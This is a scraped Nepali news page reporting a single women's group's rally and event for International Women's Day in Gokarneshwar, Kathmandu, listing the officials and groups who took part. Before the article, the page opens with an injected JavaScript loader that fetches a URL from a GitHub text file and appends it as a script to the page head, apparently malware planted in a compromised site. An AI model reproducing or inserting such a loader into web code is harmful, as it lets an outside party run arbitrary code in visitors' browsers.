;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); बिहानी एकल महिला समुहले नारा सहित नारि दिवस मनायो – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • बिहानी एकल महिला समुहले नारा सहित नारि दिवस मनायो
अन्तर्राष्ट्रिय

बिहानी एकल महिला समुहले नारा सहित नारि दिवस मनायो

फाल्गुन २४

काठमाडौ । “महिलाको सुरक्षा, सम्मान, र रोजगार समृद्ध नेपालको  आधार”भन्ने मूल नाराका साथ देशै भर १११ औ अन्तर्राष्ट्रिय महीला दिवस मनाइदैछ ।

त्यस्तै  गोकर्णेश्वर नगरपालिकाको वडा नं ५ जोरपाटी  बाहुनधारामा बिहानी एकल महीला समुहले पनि नारि दिवस मनाएको छ । महिला समुहले जोरपाटी, बौद्ध हुदै नयाबस्ती बहुन्धारामा र्याली बिशर्जन गरि कार्यकराम गरेको थियो ।

कार्यक्रममा  गो.न.प.उप-मेयर शान्ति नेपालको प्रमुख आतिथ्यतामा साथै बीहानी एकल महीला समुहकी अध्यक्ष झुमा लामाको सभापतीत्वमा भएको थियो ।

त्यसै गरि कार्यक्रम मा जिल्ला समन्वय समीतीको सदस्य सान्नानी लामा , महीला संघ क्षेत्रिय सभापति लेख कुमारी पुडासैनी, महीला नगर सभापती  लिला देवी पौडेल (भट्टराई), नगर प्रतीनीधी सत्य भामा श्रेष्ठ,वडा नं ५ का वडा सदस्य दुर्गा फुयाल,गो.नं.पा भित्र गठित बिभिन्न १५ वटा महीला समुह र १०० जना भन्दा बढी महीलाहरुको सहभागिता रहेको थियो ।

 

फेसबुक प्रतिक्रियाहरु